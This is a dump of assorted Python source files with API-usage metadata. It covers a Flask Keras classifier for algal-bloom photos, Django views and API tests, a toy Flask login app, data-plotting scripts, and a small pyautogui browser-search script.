64, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 65, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 66, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 67, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 68, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 69, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 71, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 72, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 73, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 74, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 129, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 131, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "59612291", "text": "import flask\nimport os\nimport datetime\nimport sys\n\nimport tensorflow as tf\nfrom flask import json\nfrom keras import models\n\n# initialize our Flask application and the Keras model\nfrom safetoswim.core import PhotoProcessor\nfrom safetoswim.repository import PostgresRepository, SqliteRepository\n\napplication = flask.Flask(__name__)\nmodel = None\ngraph = tf.get_default_graph()\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\nUPLOAD_FOLDER = 'images'\napplication.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\ndef load_model():\n global model\n file_dir = os.path.abspath(os.path.dirname(__file__))\n #model = ResNet50(weights=\"imagenet\")\n model_path = os.path.join(file_dir, 'models', 'hab_KerasBinaryClassifier_model.h5')\n print(f'Loading model from: {model_path}')\n model = models.load_model(model_path)\n if model is None:\n raise TypeError(f'Failed to load model from file {model_path}')\n\ndef get_model():\n global modele\n if model is None:\n load_model()\n return model\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef save_image(submitter, image_location, date, time, name='', location='', latitude=0.0, longitude=0.0):\n repo = SqliteRepository('test.sqlite')\n id = repo.add_sample(submitter, image_location, date, time, name, location, latitude, longitude)\n return id\n\n@application.route(\"/\", methods=['GET'])\ndef index():\n return '''\n Safe To Swim\n

    Welcome to SafeToSwim!

    '''\n\n@application.route(\"/predict\", methods=['GET', 'POST'])\ndef predict():\n # initialize the data dictionary that will be returned from the\n # view\n data = {\"success\": False}\n\n # ensure an image was properly uploaded to our endpoint\n if flask.request.method == \"POST\":\n if flask.request.files.get(\"image\"):\n # read the image in PIL format\n image = flask.request.files[\"image\"].read()\n photo_processor = PhotoProcessor(image)\n location = 'OakLedge'\n submitter = 'admin@safetoswim.org'\n longitude = 0.0\n # photo_processor.exif['DateTime']\n # photo_processor.exif['DateTimeOriginal']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n if 'DateTime' in photo_processor.exif_data:\n date = datetime.datetime.strptime(photo_processor.exif_data['DateTime'], '%Y:%m:%d %H:%M:%S')\n else:\n date = datetime.datetime.now()\n time = date.time()\n date = date.date()\n #date, time, name='', location='', latitude=0.0, longitude=0.0\n save_image(submitter, 'images/one.jpg', str(date), str(time), 'New Sample', location,\n photo_processor.latitude, photo_processor.longitude)\n\n # preprocess the image and prepare it for classification\n rgb_data = photo_processor.prepare_rgb_data(img_size=(128, 128))\n\n # classify the input image and then initialize the list\n # of predictions to return to the client\n # classify the input image and then initialize the list\n # of predictions to return to the client\n preds = None\n model = get_model()\n with graph.as_default():\n preds = model.predict(rgb_data)\n if preds[0][0] >= 0.5:\n data[\"prediction\"] = 'bloom'\n else:\n data[\"prediction\"] = 'not-bloom'\n\n #data['exif'] = photo_processor.exif\n\n # loop over the results and add them to the list of\n # returned predictions\n '''\n for (imagenetID, label, prob) in results[0]:\n r = {\"label\": label, \"probability\": float(prob)}\n data[\"predictions\"].append(r)\n '''\n\n # indicate that the request was a success\n data[\"success\"] = True\n\n # return the data dictionary as a JSON response\n response = flask.jsonify(data)\n return response\n else:\n pass\n else:\n return '''\n \n Upload new File\n

    Upload new File

    \n
    \n

    \n \n

    \n

    %s

    \n ''' % \"
    \".join(os.listdir(application.config['UPLOAD_FOLDER'], ))\n\n\nif __name__ == \"__main__\":\n print((\"* Loading Keras model and Flask starting server...\"\n \"please wait until server has fully started\"))\n load_model()\n application.run(host=\"0.0.0.0\", debug=True)\n\n", "sub_path": "safetoswim/servers/flask_server.py", "file_name": "flask_server.py", "file_ext": "py", "file_size_in_byte": 4954, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "keras.models.load_model", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 28, "usage_type": "name"}, {"api_name": "safetoswim.repository.SqliteRepository", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request.files.get", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "attribute"}, {"api_name": "safetoswim.core.PhotoProcessor", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 79, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 118, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "415168496", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.views.generic import View, TemplateView, CreateView, UpdateView, FormView, ListView\nfrom django.views import generic\nfrom django.conf import settings \nfrom django.shortcuts import render\n\n# Create your views here.\n\nclass Sell_In_OutView(TemplateView):\n template_name = 'sell-inXsell-out.html'\nsell = Sell_In_OutView.as_view() \n\n\nclass VendasDiariasView(TemplateView):\n template_name = 'vendas_diarias.html'\nvendas_diarias = VendasDiariasView.as_view() \n\n\nclass NielsenView(TemplateView):\n template_name = 'nielsen.html'\nnielsen = NielsenView.as_view()\n\n\nclass CloseUpView(TemplateView):\n template_name = 'close-up.html'\ncloseup = CloseUpView.as_view()", "sub_path": "PowerBiNestle/core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 745, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 20, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "132611014", "text": "from flask import Flask\nfrom flask import render_template, request, session, url_for, redirect\n\napp = Flask(__name__)\napp.secret_key = 'whoknowsthissecretw'\n\n@app.route('/')\ndef index():\n return render_template('index2.html')\n \n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n@app.route('/login', methods=['POST'])\ndef login():\n user = request.form['user']\n session['user'] = user\n return render_template('welcome.html', user_name=user)\n\n@app.route('/logout')\ndef logout():\n del session['user']\n return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)", "sub_path": "FlaskEx1/src/ex2_v1.py", "file_name": "ex2_v1.py", "file_ext": "py", "file_size_in_byte": 631, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "420167610", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom csv import reader\r\n\r\nx = []\r\ny = []\r\nvalues = []\r\nmax_values = []\r\n\r\n# HÄMTA DATA\r\nwith open('rawdata119870.csv', 'r') as csvfile:\r\n data = list(reader(csvfile))\r\n\r\nfor row in data:\r\n values.append({'x': float(row[0]), 'y': float(row[2])})\r\n\r\n# RÄKNA UT MEDLET\r\nindex = 0\r\nlenSample = 27\r\n\r\nwhile index < len(values):\r\n n = 0\r\n xv = 0 \r\n yv = 0\r\n try:\r\n while n < lenSample:\r\n yv += values[index]['y']\r\n xv += values[index]['x']\r\n n += 1\r\n index += 1\r\n\r\n x.append(xv/lenSample)\r\n y.append(yv/lenSample)\r\n except IndexError:\r\n pass\r\n\r\nplt.plot(x, y)\r\nplt.title('graph')\r\nplt.show()", "sub_path": "AI/data analys/uppgift/2c.py", "file_name": "2c.py", "file_ext": "py", "file_size_in_byte": 733, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "csv.reader", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "270521174", "text": "import threading\nfrom . import Paragraph\nfrom PIL import Image, ImageDraw, ImageEnhance\n\n#process for the thread that creates the first layer\nclass baseThread (threading.Thread):\n def __init__(self, threadID, lock, image, outputFile):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.image = image\n self.lock = lock\n self.outputFile = outputFile\n\n def run(self):\n #print(\"Starting \" + self.name)\n # Get lock to synchronize threads\n self.lock.acquire()\n\n pixels = self.image.load();\n\n for x in range(self.image.size[0]):\n for y in range(self.image.size[1]):\n avg = ( pixels[x,y][0] + pixels[x,y][1] + pixels[x,y][2] )//3\n pixels[x,y] = (avg,avg,avg,255)\n\n\n enhancer = ImageEnhance.Contrast(self.image)\n enhancer.enhance(1.8).save(self.outputFile)\n\n # Free lock to release next thread\n self.lock.release()", "sub_path": "dataportrait/portraitimage/lib/baseLayer.py", "file_name": "baseLayer.py", "file_ext": "py", "file_size_in_byte": 964, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threading.Thread", "line_number": 6, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 8, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 8, "usage_type": "attribute"}, {"api_name": "PIL.ImageEnhance.Contrast", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.ImageEnhance", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "212088095", "text": "\"\"\"\nTesting UrlComparator\n\nThere are little comments for each testcase because the name\nof each testcase is very descriptive\n\"\"\"\n\nfrom django.test import TestCase\nfrom sectionproject.urlutils.urlcomparator.urlcomparator import UrlComparator\n\nclass ComparatorTest(TestCase):\n # input: wiki example in writeup\n # expected: equal\n def test_wikiExample(self):\n urlA = 'http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations'\n urlB = 'http://en.wikipedia.org/wiki/Unit_testing#Language-'\n \n expected = 0\n res = UrlComparator.compareNormalizeUrl(urlA, urlB)\n \n self.assertEqual(expected, res, 'expected: ' + str(expected) +\\\n ', actual: ' + str(res))\n \n # input: two different url\n # expected: one larger than the other, viceversa for opposite direction \n def test_normalGreaterLesser(self):\n urlA = 'www.google.com'\n urlB = 'www.nba.com'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n self.assertTrue(UrlComparator.compareNormalizeUrl(urlB, urlA) > 0)\n \n # input: one url with www., one without\n # expected: correct behavior\n def test_normalizedWWWDotDifferentUrl(self):\n urlA = 'www.google.com'\n urlB = 'nba.com'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n \n # inputs: url with same query in different order\n # expected equal\n def test_normalizedEqualDifferentQueryUrl(self):\n urlA = 'www.google.com/?q=cse403;id=1'\n urlB = 'www.google.com/?id=1&q=cse403'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) == 0)\n \n # input: url with capital letters in path\n # expected: capital letter should come before \n def test_caseSensitiveCases(self):\n urlA = 'www.google.com/Images'\n urlB = 'www.google.com/images'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n \n # input: two urls\n # expected: order by alphabetical order\n def test_sourcecomparison(self):\n urlA = 'www.google.com'\n urlB = 'nba.com'\n self.assertTrue(UrlComparator.compareSourceUrl(urlA, urlB) > 0)\n \n # input: a url and two list where one has exactly the same url\n # expected: source unique for one and not source unique for the other\n def test_sourceUnique(self):\n url = 'www.google.com'\n list1 = ['google.com', 'http://google.com']\n list2 = ['www.google.com', 'something.net']\n \n self.assertTrue(UrlComparator.isSourceUnique(url, list1))\n self.assertFalse(UrlComparator.isSourceUnique(url, list2))\n \n # input: a url compared to 1) same url, 2) different but same norm url, 3) entirely\n # different url\n # expected: 1) False, 2) False, 3) True \n def test_normunique(self):\n url = 'http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations'\n # same url\n list1 = ['http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations']\n \n # norm same url\n list2 = ['http://en.wikipedia.org/wiki/Unit_testing#Language-']\n \n # different url\n list3 = ['wikipedia.org']\n \n self.assertFalse(UrlComparator.isNormalizeUnique(url, list1))\n self.assertFalse(UrlComparator.isNormalizeUnique(url, list2))\n self.assertTrue(UrlComparator.isNormalizeUnique(url, list3))\n \n \n \n \n \n \n \n \n ", "sub_path": "sectionproject/urlutils/urlcomparator/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3556, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 19, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 19, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 30, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 30, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 31, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 31, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 39, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 39, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 47, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 47, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 55, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 55, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareSourceUrl", "line_number": 62, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 62, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isSourceUnique", "line_number": 71, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 71, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isSourceUnique", "line_number": 72, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 72, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 88, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 88, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 89, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 89, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 90, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 90, "usage_type": "name"}]} +{"seq_id": "447564364", "text": "import cPickle as pickle\nfrom itertools import compress\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.axes_grid1 import ImageGrid\nfrom sklearn.decomposition import PCA \nfrom sklearn.manifold import TSNE\n\n\ndef pca(states, labels, n_components, plot_by_colors=False):\n assert n_components == 2 or n_components == 3, 'Wrong number of components'\n\n print('PCA')\n pca = PCA(n_components=n_components)\n\n print('Fitting & transforming')\n transformed_states = pca.fit_transform(states)\n\n print('Visual')\n plt.clf()\n plt.cla()\n color_names = ['blue', 'red', 'black', 'green', 'pink', 'yellow', 'brown', 'magenta', 'cyan', 'orange']\n colors = np.choose(labels, color_names)\n if n_components == 2:\n\n if plot_by_colors:\n fig = plt.figure(1, (4., 4.))\n grid = ImageGrid(fig, 111, # similar to subplot(111)\n nrows_ncols=(3, 4), # creates 2x2 grid of axes\n axes_pad=0.1, # pad between axes in inch.\n )\n\n for i in range(10):\n\n labels_one = np.array(labels)\n idxs = labels_one == i\n states_one = np.array(list(compress(transformed_states, idxs)))\n labels_one = [color_names[i] for _ in range(len(states_one))]\n grid[i].scatter(states_one[:, 0], states_one[:, 1], c=labels_one)\n\n # plt.scatter(transformed_states[:, 0], transformed_states[:, 1], c=colors)\n elif n_components == 3:\n fig = plt.figure(1, figsize=(4, 3))\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n ax.scatter(transformed_states[:, 0], transformed_states[:, 1], transformed_states[:, 2], c=colors)\n\n plt.show()\n\n\ndef tsne(states, labels, n_components):\n assert n_components == 2 or n_components == 3, 'Wrong number of components'\n\n print('T-SNE')\n tsne = TSNE(n_components=n_components)\n\n print('Fitting & transforming')\n transformed_states = tsne.fit_transform(states)\n\n print('Visual')\n plt.clf()\n plt.cla()\n colors = np.choose(labels, ['blue', 'red', 'black', 'green', 'pink', 'yellow', 'brown', 'magenta', 'cyan', 'orange'])\n if n_components == 2:\n plt.scatter(transformed_states[:, 0], transformed_states[:, 1], c=colors)\n elif n_components == 3:\n fig = plt.figure(1, figsize=(4, 3))\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n ax.scatter(transformed_states[:, 0], transformed_states[:, 1], transformed_states[:, 2], c=colors)\n\n plt.show()\n\n\nif __name__ == '__main__':\n print('Loading')\n df = pickle.load(open('/home/petrbel/Dropbox/ALI/states.pkl', 'rb'))\n pca(states=list(df['states']), labels=list(df['labels']), n_components=2, plot_by_colors=True)\n # pca(states=list(df['states']), labels=list(df['labels']), n_components=3)\n # tsne(states=list(df['states']), labels=list(df['labels']), n_components=2)\n # tsne(states=list(df['states']), labels=list(df['labels']), n_components=3)\n print('Finished')\n", "sub_path": "visual.py", "file_name": "visual.py", "file_ext": "py", "file_size_in_byte": 3103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.decomposition.PCA", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.choose", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "mpl_toolkits.axes_grid1.ImageGrid", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "itertools.compress", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "mpl_toolkits.mplot3d.Axes3D", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.choose", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "mpl_toolkits.mplot3d.Axes3D", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "cPickle.load", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "61919113", "text": "import pyautogui\r\nimport time\r\nfrom selenium import webdriver\r\n\r\n#定义图像识别双击事件\r\ndef mouseDoubleClick(image):\r\n x,y=pyautogui.locateCenterOnScreen(image,confidence=0.9)\r\n pyautogui.click(x,y,clicks=2,interval=0.2,duration=0.2,button='left')\r\n\r\n#定义单击事件\r\ndef mouseClick(image):\r\n x,y=pyautogui.locateCenterOnScreen(image,confidence=0.9)\r\n pyautogui.click(x,y,clicks=1,interval=0.2,duration=0.2,button='left')\r\n\r\nmouseDoubleClick(image = 'chorm.png')\r\n\r\npyautogui.write(\"www.baidu.com\")\r\ntime.sleep(1)\r\npyautogui.press(\"enter\")\r\ntime.sleep(3)\r\n\r\npyautogui.write(\"Detroit: Become Human\")\r\ntime.sleep(2)\r\npyautogui.press(\"enter\")\r\n", "sub_path": "students/Siyang Liu/pyaotugui/pyautogui_serch.py", "file_name": "pyautogui_serch.py", "file_ext": "py", "file_size_in_byte": 667, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pyautogui.locateCenterOnScreen", "line_number": 7, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 8, "usage_type": "call"}, {"api_name": "pyautogui.locateCenterOnScreen", "line_number": 12, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 13, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 18, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 22, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "115663981", "text": "from tastypie.test import ResourceTestCase\nfrom projects.tests.factories import ProjectFactory\nfrom tools.mongo import MongoFlushMixin\nfrom .. import models\n\n\nclass BaseTaskResourceCase(MongoFlushMixin, ResourceTestCase):\n \"\"\"Base task resource case\"\"\"\n mongo_flush = ['tasks']\n\n def setUp(self):\n MongoFlushMixin.setUp(self)\n ResourceTestCase.setUp(self)\n\n ProjectFactory(name='test', is_enabled=True)\n\n\nclass RawTaskResourceCase(BaseTaskResourceCase):\n \"\"\"Create task case\"\"\"\n\n def setUp(self):\n super(RawTaskResourceCase, self).setUp()\n self.url = '/api/v1/tasks/raw/'\n\n def test_create_on_post(self):\n \"\"\"Test create on post\"\"\"\n self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy',\n },\n 'project': 'test',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(1, models.Tasks.count())\n\n def test_error_on_wrong_service(self):\n \"\"\"Test error on wrong service\"\"\"\n response = self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy!!!',\n },\n 'project': 'test',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(response.status_code, 404)\n\n def test_error_on_wrong_project(self):\n \"\"\"Test error on wrong project\"\"\"\n response = self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy',\n },\n 'project': 'test!!',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(response.status_code, 404)\n\n\nclass TaskResourceCase(BaseTaskResourceCase):\n \"\"\"Get tasks resource case\"\"\"\n\n def setUp(self):\n super(TaskResourceCase, self).setUp()\n self.url = '/api/v1/tasks/task/'\n\n def _create_tasks(self, project='test', count=20):\n \"\"\"Create tasks\"\"\"\n models.Tasks.insert([{\n 'service': {\n 'name': 'dummy',\n },\n 'project': project,\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [{\n 'name': 'dummy',\n 'raw': '1',\n 'status': 1,\n 'prepared': '123{}'.format(n),\n }]\n } for n in range(count)])\n\n def test_get_all(self):\n \"\"\"Test get all\"\"\"\n self._create_tasks()\n response = self.api_client.get(self.url)\n data = self.deserialize(response)\n self.assertEqual(data['meta']['total_count'], 20)\n self.assertIsNone(data['objects'][0]['violations'])\n\n def test_get_all_with_violations(self):\n \"\"\"Test get all with violations\"\"\"\n self._create_tasks()\n response = self.api_client.get('{}?with_violations=1'.format(self.url))\n data = self.deserialize(response)\n self.assert_(data['objects'][0]['violations'][0]['name'])\n self.assert_(data['objects'][0]['violations'][0]['status'])\n\n def test_get_with_full_violations(self):\n \"\"\"Test get with full violations\"\"\"\n self._create_tasks()\n response = self.api_client.get(\n '{}?with_full_violations=1'.format(self.url),\n )\n data = self.deserialize(response)\n self.assert_(data['objects'][0]['violations'][0]['raw'])\n self.assert_(data['objects'][0]['violations'][0]['prepared'])\n\n def test_filter_by_project(self):\n \"\"\"Test filter by project\"\"\"\n self._create_tasks('test', 5)\n self._create_tasks('nope', 10)\n response = self.api_client.get('{}?project=test'.format(self.url))\n data = self.deserialize(response)\n self.assertEqual(data['meta']['total_count'], 5)\n", "sub_path": "tasks/tests/test_resources.py", "file_name": "test_resources.py", "file_ext": "py", "file_size_in_byte": 4398, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tools.mongo.MongoFlushMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "tastypie.test.ResourceTestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "tools.mongo.MongoFlushMixin.setUp", "line_number": 12, "usage_type": "call"}, {"api_name": "tools.mongo.MongoFlushMixin", "line_number": 12, "usage_type": "name"}, {"api_name": "tastypie.test.ResourceTestCase.setUp", "line_number": 13, "usage_type": "call"}, {"api_name": "tastypie.test.ResourceTestCase", "line_number": 13, "usage_type": "name"}, {"api_name": "projects.tests.factories.ProjectFactory", "line_number": 15, "usage_type": "call"}]} 